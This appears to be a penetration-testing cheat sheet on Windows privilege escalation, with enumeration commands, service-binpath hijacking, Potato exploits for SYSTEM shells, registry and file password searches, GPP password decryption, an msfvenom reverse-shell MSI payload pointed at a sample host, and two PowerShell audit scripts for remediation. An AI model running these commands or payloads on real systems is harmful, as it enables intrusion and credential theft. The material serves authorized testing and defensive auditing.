CyberCheatsheets

Windows Privilege Escalation Cheat Sheet

Enumeration and escalation paths from a low-privilege Windows user to SYSTEM or Administrator on authorized engagements.

Category: Exploitation & Payloads | Tags: enumeration, post-exploitation, privesc, tokens, windows | Updated 2026-06-17

Overview

Windows privilege escalation hinges on misconfigurations: unquoted service paths, weak service/registry permissions, AlwaysInstallElevated, stored credentials, and abusable privileges (SeImpersonate). Enumerate with winPEAS, confirm findings manually, then escalate. SeImpersonate (held by most service accounts) plus a Potato exploit is the classic path to SYSTEM.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

First: situational awareness

User, groups, and PRIVILEGES — look for SeImpersonate/SeAssignPrimaryToken/SeBackup

whoami /all

OS build and hotfixes — feed to a missing-patch check

systeminfo

Local users and admin group members (cmd.exe syntax throughout; in PowerShell separate commands with ; instead of &)

net user & net localgroup administrators

Network context and pivot routes

ipconfig /all & route print

Automated enumeration

All-in-one Windows privesc scanner

winPEASx64.exe

PowerUp common-misconfig checks

powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

C# PowerUp port (audit mode)

.\SharpUp.exe audit

Service misconfigurations

Find unquoted service paths with spaces (wmic is deprecated on current builds; Get-CimInstance Win32_Service gives the same PathName column)

wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """

Inspect a service's binary path and start mode

sc qc <service>

Services writable by Everyone/Users (weak permissions)

accesschk.exe -uwcqv "Everyone" * /accepteula

Hijack a writable service to run your payload

sc config <service> binpath= "C:\Windows\Temp\rev.exe" && sc stop <service> && sc start <service>

Restore the original binpath afterwards.
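The unquoted-path one-liner above and the accesschk check only surface candidates; the tip further down says the finding matters only when a directory earlier in the path is writable. The following PowerShell is an added audit helper, not part of this cheat sheet, winPEAS, PowerUp or SharpUp: it enumerates services with an unquoted ImagePath containing a space, computes the directories Windows would probe first (C:\Program.exe, C:\Program Files\My.exe, ...), and reports whether the current token holds write rights on any of them. Function names are this example's own.

```powershell
# Added example: confirm unquoted-service-path candidates by checking whether
# the current user can write to a directory Windows would search first.
# Function names (Get-UnquotedServicePath etc.) are this example's own.

function Get-CurrentUserSids {
    # SID of the user plus every group SID present in the current token
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
}

function Test-DirectoryWritable {
    param([string]$Path, [string[]]$Sids)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }

    # Any of these rights lets the caller drop a file into the directory.
    # The two generic bits cover inherited ACEs that Get-Acl leaves unmapped.
    $writeMask = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
                 [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [int][System.Security.AccessControl.FileSystemRights]::FullControl -bor
                 0x40000000 -bor 0x10000000   # GENERIC_WRITE, GENERIC_ALL

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate(
                [System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }                          # orphaned or untranslatable SID
        if ($Sids -notcontains $sid) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    $sids = Get-CurrentUserSids
    # Win32_Service.PathName is the raw ImagePath value, quotes included if present
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc  = $_
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }
        if ($path.StartsWith('"')) { return }                 # quoted: not ambiguous
        if ($path -match '^[A-Za-z]:\\Windows\\') { return }  # same exclusion as the wmic one-liner

        # Keep only the executable part; spaces in the arguments do not matter
        $exe = if ($path -match '^(.*?\.exe)') { $Matches[1] } else { $path }
        if ($exe -notmatch ' ') { return }

        # For each space, Windows first tries the prefix before it as a program;
        # the directory holding that prefix is where a planted binary would have to go.
        $dirs = for ($i = 0; $i -lt $exe.Length; $i++) {
            if ($exe[$i] -eq ' ') { Split-Path -Path $exe.Substring(0, $i) -Parent }
        }
        $writable = @($dirs | Sort-Object -Unique |
            Where-Object { Test-DirectoryWritable -Path $_ -Sids $sids })

        [pscustomobject]@{
            Service     = $svc.Name
            RunsAs      = $svc.StartName
            StartMode   = $svc.StartMode
            Path        = $path
            WritableDir = ($writable -join '; ')
            Exploitable = ($writable.Count -gt 0)
        }
    }
}

# Only rows with Exploitable = True need a remediation ticket (quote the path in
# the ImagePath value, or tighten the directory ACL); the rest is scanner noise.
Get-UnquotedServicePath | Sort-Object Exploitable -Descending | Format-Table -AutoSize
```

Run it in the same low-privilege context the scanner ran in: the ACL check is evaluated against the current token's SIDs, so a result from an admin shell says nothing about what a service account or standard user could do.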

SeImpersonate → SYSTEM (Potato)

PrintSpoofer: SYSTEM shell from SeImpersonate

.\PrintSpoofer64.exe -i -c cmd

GodPotato: works on modern Windows builds

.\GodPotato-NET4.exe -cmd "cmd /c whoami"

Stored credentials

Hunt passwords across the registry

reg query HKLM /f password /t REG_SZ /s 2>nul

Saved credentials usable with runas /savecred

cmdkey /list

AlwaysInstallElevated: if both values are 1, any MSI installs as SYSTEM

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Grep files for plaintext passwords

findstr /si password *.xml *.ini *.txt *.config 2>nul

Quick one-liners

List running services and their accounts

tasklist /svc

Check installed patches (for missing-KB exploits)

wmic qfe get HotFixID,InstalledOn

Generate an MSI payload for AlwaysInstallElevated (sample LHOST/LPORT)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi

Decrypt a found GPP cPassword

gpp-decrypt <cpassword>

Scheduled tasks (look for writable task binaries)

schtasks /query /fo LIST /v

Tips

  • Run whoami /all first — SeImpersonate is held by most service accounts and leads straight to SYSTEM.
  • Unquoted service paths only matter if you can write to a folder earlier in the path.
  • AlwaysInstallElevated must be set in BOTH HKLM and HKCU to be exploitable.
  • winPEAS finds candidates; always confirm write permissions with accesschk before acting.
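The tips above boil down to three conditions that are worth confirming in one pass: which abusable privileges the token actually holds, whether AlwaysInstallElevated is set in both hives rather than one, and whether any credentials are saved for runas /savecred. The PowerShell below is an added example, not this cheat sheet's or winPEAS's code; it wraps whoami /priv, the two reg query locations and cmdkey /list from the sections above into a single report object that an auditor can attach to a finding. Function names are this example's own; the cmdkey parsing assumes an English-locale "Target:" label.

```powershell
# Added example: one-shot confirmation of the non-service findings listed on
# this page (token privileges, AlwaysInstallElevated, saved credentials).
# Function names are this example's own, not winPEAS/PowerUp output.

function Test-AlwaysInstallElevated {
    # Exploitable only when BOTH hives carry the value 1
    $keys = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )
    $values = @{}
    foreach ($key in $keys) {
        $hive = $key.Split(':')[0]
        $item = Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $values[$hive] = if ($item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKLM        = $values['HKLM']
        HKCU        = $values['HKCU']
        Exploitable = ($values['HKLM'] -eq 1 -and $values['HKCU'] -eq 1)
    }
}

function Get-TokenPrivilegeOfInterest {
    # whoami /priv /fo csv gives a clean three-column CSV:
    # "Privilege Name","Description","State". Disabled privileges still matter:
    # a process can re-enable any privilege that is present in its token.
    $watch = @(
        'SeImpersonatePrivilege'          # Potato family -> SYSTEM
        'SeAssignPrimaryTokenPrivilege'   # same family
        'SeBackupPrivilege'               # read any file regardless of ACL
        'SeRestorePrivilege'
        'SeDebugPrivilege'
        'SeTakeOwnershipPrivilege'
    )
    whoami /priv /fo csv | ConvertFrom-Csv |
        Where-Object { $watch -contains $_.'Privilege Name' } |
        ForEach-Object { [pscustomobject]@{ Privilege = $_.'Privilege Name'; State = $_.State } }
}

function Get-SavedCredentialTarget {
    # cmdkey /list prints one "Target: ..." line per stored credential
    # (label is localized; this assumes an English system)
    cmdkey /list | Select-String -Pattern '^\s*Target:' |
        ForEach-Object { ($_.Line -split ':', 2)[1].Trim() }
}

function Invoke-PrivescAudit {
    $aie   = Test-AlwaysInstallElevated
    $privs = @(Get-TokenPrivilegeOfInterest)
    $creds = @(Get-SavedCredentialTarget)
    [pscustomobject]@{
        User                  = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        AlwaysInstallElevated = $aie.Exploitable
        TokenPrivileges       = ($privs | ForEach-Object { "$($_.Privilege)=$($_.State)" }) -join ', '
        SavedCredentials      = $creds.Count
        SavedTargets          = ($creds -join ', ')
    }
}

Invoke-PrivescAudit | Format-List
```

A non-empty TokenPrivileges field on a service account is expected and is the reason the Potato section exists; the remediation question is why an interactive or application account holds it. AlwaysInstallElevated = True and any SavedCredentials count above zero are straightforward policy fixes.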
